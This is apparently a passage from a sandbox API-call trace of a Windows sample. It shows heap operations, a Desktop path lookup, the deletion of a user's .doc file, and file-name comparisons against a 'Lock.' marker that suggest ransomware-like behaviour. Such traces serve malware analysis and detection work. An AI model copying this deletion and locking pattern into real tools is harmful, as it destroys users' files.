[0186.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0186.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0186.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0186.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0186.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f41668 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0186.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0186.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0186.258] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0186.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0186.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0186.258] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0186.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0186.259] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/IqAWqPLMQZePl.doc", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc", lpFilePart=0x8cedf4*="IqAWqPLMQZePl.doc") returned 0x29 [0186.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0186.259] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\iqawqplmqzepl.doc")) returned 0x20 [0186.260] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c72a90, ftCreationTime.dwHighDateTime=0x1d5ef8b, ftLastAccessTime.dwLowDateTime=0x6aceb30, ftLastAccessTime.dwHighDateTime=0x1d5e849, ftLastWriteTime.dwLowDateTime=0x6aceb30, ftLastWriteTime.dwHighDateTime=0x1d5e849, nFileSizeHigh=0x0, nFileSizeLow=0x4323, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="IqAWqPLMQZePl.doc", cAlternateFileName="IQAWQP~1.DOC")) returned 0xa87610 [0186.260] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\iqawqplmqzepl.doc")) returned 1 [0186.411] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c72a90, ftCreationTime.dwHighDateTime=0x1d5ef8b, ftLastAccessTime.dwLowDateTime=0x6aceb30, ftLastAccessTime.dwHighDateTime=0x1d5e849, ftLastWriteTime.dwLowDateTime=0x6aceb30, ftLastWriteTime.dwHighDateTime=0x1d5e849, nFileSizeHigh=0x0, nFileSizeLow=0x4323, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="IqAWqPLMQZePl.doc", cAlternateFileName="IQAWQP~1.DOC")) returned 0 [0186.411] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0186.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0186.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0186.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0186.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0186.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0186.411] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0186.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0186.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.412] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0186.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0186.412] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/IqAWqPLMQZePl.doc", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc", lpFilePart=0x8cf650*="IqAWqPLMQZePl.doc") returned 0x29 [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0186.412] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\IqAWqPLMQZePl.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\iqawqplmqzepl.doc")) returned 0xffffffff [0186.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0186.413] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0186.413] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.413] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0186.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0186.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kjGjReTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGjReTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GjReTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jReTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ReTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eTolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tolqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="olqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qh2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VyQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xmn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mn2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0186.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0186.414] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0186.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0186.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0186.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0186.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x32) returned 0x2e77588 [0186.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0186.415] CompareStringW 